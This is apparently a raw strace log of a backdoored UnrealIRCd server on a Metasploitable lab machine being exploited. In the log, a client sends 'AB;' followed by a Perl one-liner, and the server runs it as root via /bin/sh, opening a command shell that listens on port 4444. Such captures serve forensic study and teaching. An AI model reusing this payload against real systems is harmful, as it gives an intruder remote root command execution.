4519  07:43:47.432966 select(1024, [2 3 4 7 9], [], NULL, {0, 990000}) = 1 (in [2], left {0, 830000})

4519  07:43:47.594239 clock_gettime(CLOCK_MONOTONIC, {3037, 411260284}) = 0

4519  07:43:47.594261 accept(2, 0, NULL) = 5

4519  07:43:47.594282 getpeername(5, {sa_family=AF_INET, sin_port=htons(40885), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:47.594321 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:47.594336 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:47.594351 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:47.594363 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:47.594375 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:47.594386 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:47.594400 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:47.594417 clock_gettime(CLOCK_MONOTONIC, {3037, 411430631}) = 0

4519  07:43:47.594429 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:47.594441 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:47.594451 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:47.594460 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:47.594470 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:47.594486 send(6, "\347s\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:47.594610 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:47.594720 gettimeofday({1495626227, 594725}, NULL) = 0

4519  07:43:47.594734 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:43:47.598451 clock_gettime(CLOCK_MONOTONIC, {3037, 415467798}) = 0

4519  07:43:47.598467 recvfrom(6, "\347s\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\366\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:47.598510 close(6)          = 0

4519  07:43:47.598524 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:47.598538 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:43:47.598704 time(NULL)        = 1495626227

4519  07:43:47.598740 time(NULL)        = 1495626227

4519  07:43:47.598765 gettimeofday({1495626227, 598769}, NULL) = 0

4519  07:43:47.598777 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:47.598806 clock_gettime(CLOCK_MONOTONIC, {3037, 415818891}) = 0

4519  07:43:47.598816 gettimeofday({1495626227, 598820}, NULL) = 0

4519  07:43:47.598867 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:43:48.589894 clock_gettime(CLOCK_MONOTONIC, {3038, 406903048}) = 0

4519  07:43:48.589894 gettimeofday({1495626228, 589894}, NULL) = 0

4519  07:43:48.589894 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:48.589895 clock_gettime(CLOCK_MONOTONIC, {3038, 406903764}) = 0

4519  07:43:48.589895 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:48.589895 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:48.589895 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:48.589896 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:48.589902 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12718

12718 07:43:48.589971 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12718 07:43:48.589986 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12718 07:43:48.589996 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12718 07:43:48.590010 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12718 07:43:48.590224 brk(0)            = 0x80f9000

12718 07:43:48.590246 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.590262 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa7000

12718 07:43:48.590279 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.590296 open("/etc/ld.so.cache", O_RDONLY) = 1

12718 07:43:48.590308 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12718 07:43:48.590326 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f9f000

12718 07:43:48.590336 close(1)          = 0

12718 07:43:48.590347 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.590362 open("/lib/libncurses.so.5", O_RDONLY) = 1

12718 07:43:48.590375 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12718 07:43:48.590469 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12718 07:43:48.590486 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6f000

12718 07:43:48.590498 mmap2(0xb7f9c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f9c000

12718 07:43:48.590515 close(1)          = 0

12718 07:43:48.590527 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.590569 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12718 07:43:48.590606 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12718 07:43:48.590724 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12718 07:43:48.590742 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6b000

12718 07:43:48.590757 mmap2(0xb7f6d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f6d000

12718 07:43:48.590773 close(1)          = 0

12718 07:43:48.590784 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.590797 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12718 07:43:48.590811 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12718 07:43:48.590897 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12718 07:43:48.590913 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f6a000

12718 07:43:48.590926 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e1b000

12718 07:43:48.590937 mmap2(0xb7f64000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f64000

12718 07:43:48.590951 mmap2(0xb7f67000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f67000

12718 07:43:48.590965 close(1)          = 0

12718 07:43:48.590986 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e1a000

12718 07:43:48.590998 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e1a6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12718 07:43:48.591104 mprotect(0xb7f64000, 4096, PROT_READ) = 0

12718 07:43:48.591188 munmap(0xb7f9f000, 29913) = 0

12718 07:43:48.591230 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.591244 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12718 07:43:48.591263 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd82740) = -1 ENOTTY (Inappropriate ioctl for device)

12718 07:43:48.591293 brk(0)            = 0x80f9000

12718 07:43:48.591303 brk(0x80fa000)    = 0x80fa000

12718 07:43:48.591314 brk(0x80fb000)    = 0x80fb000

12718 07:43:48.591330 getuid32()        = 0

12718 07:43:48.591339 getgid32()        = 0

12718 07:43:48.591348 geteuid32()       = 0

12718 07:43:48.591356 getegid32()       = 0

12718 07:43:48.591369 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.591382 time(NULL)        = 1495626228

12718 07:43:48.591394 brk(0x80fc000)    = 0x80fc000

12718 07:43:48.591408 brk(0x80fd000)    = 0x80fd000

12718 07:43:48.591427 open("/proc/meminfo", O_RDONLY) = 1

12718 07:43:48.591447 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12718 07:43:48.591465 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa6000

12718 07:43:48.591476 read(1, "MemTotal:      1035240 kB\nMemFree:        304908 kB\nBuffers:         89852 kB\nCached:         478908 kB\nSwapCached:          0 kB\nActive:         258200 kB\nInactive:       439484 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        304668 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5144 kB\nWriteback:           0 kB\nAnonPages:      128976 kB\nMapped:          52004 kB\nSlab:            21288 kB\nSReclaimable:    12408 kB\nSUnreclaim:       8880 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12718 07:43:48.591702 close(1)          = 0

12718 07:43:48.591729 munmap(0xb7fa6000, 4096) = 0

12718 07:43:48.591742 brk(0x80fe000)    = 0x80fe000

12718 07:43:48.591769 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12718 07:43:48.591795 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12718 07:43:48.591807 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12718 07:43:48.591818 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12718 07:43:48.591830 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12718 07:43:48.591841 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12718 07:43:48.591854 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.591866 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12718 07:43:48.591878 uname({sys="Linux", node="metasploitable", ...}) = 0

12718 07:43:48.591925 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12718 07:43:48.591942 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12718 07:43:48.591960 brk(0x8100000)    = 0x8100000

12718 07:43:48.591971 getcwd("/etc/unreal", 4096) = 12

12718 07:43:48.591985 getpid()          = 12718

12718 07:43:48.592001 getppid()         = 4519

12718 07:43:48.592016 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12718 07:43:48.592035 stat64("/sbin/sh", 0xbfd82718) = -1 ENOENT (No such file or directory)

12718 07:43:48.592047 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12718 07:43:48.592064 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12718 07:43:48.592087 socket(PF_FILE, SOCK_STREAM, 0) = 1

12718 07:43:48.592100 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12718 07:43:48.592297 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12718 07:43:48.592498 close(1)          = 0

12718 07:43:48.592593 socket(PF_FILE, SOCK_STREAM, 0) = 1

12718 07:43:48.592635 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12718 07:43:48.592663 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12718 07:43:48.592693 close(1)          = 0

12718 07:43:48.592715 open("/etc/nsswitch.conf", O_RDONLY) = 1

12718 07:43:48.592729 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12718 07:43:48.592746 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa6000

12718 07:43:48.592757 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12718 07:43:48.592805 read(1, "", 4096) = 0

12718 07:43:48.592814 close(1)          = 0

12718 07:43:48.592823 munmap(0xb7fa6000, 4096) = 0

12718 07:43:48.592839 open("/etc/ld.so.cache", O_RDONLY) = 1

12718 07:43:48.592851 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12718 07:43:48.592866 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f9f000

12718 07:43:48.592877 close(1)          = 0

12718 07:43:48.592887 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.592901 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12718 07:43:48.592915 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12718 07:43:48.593089 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12718 07:43:48.593107 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e11000

12718 07:43:48.593119 mmap2(0xb7e18000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e18000

12718 07:43:48.593136 close(1)          = 0

12718 07:43:48.593147 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.593160 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12718 07:43:48.593174 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12718 07:43:48.593259 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12718 07:43:48.593275 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df9000

12718 07:43:48.593286 mmap2(0xb7e0d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e0d000

12718 07:43:48.593301 mmap2(0xb7e0f000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e0f000

12718 07:43:48.593315 close(1)          = 0

12718 07:43:48.593341 munmap(0xb7f9f000, 29913) = 0

12718 07:43:48.593357 open("/etc/ld.so.cache", O_RDONLY) = 1

12718 07:43:48.593369 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12718 07:43:48.593385 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f9f000

12718 07:43:48.593395 close(1)          = 0

12718 07:43:48.593405 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.593419 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12718 07:43:48.593432 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12718 07:43:48.593665 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12718 07:43:48.593735 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7def000

12718 07:43:48.593761 mmap2(0xb7df7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7df7000

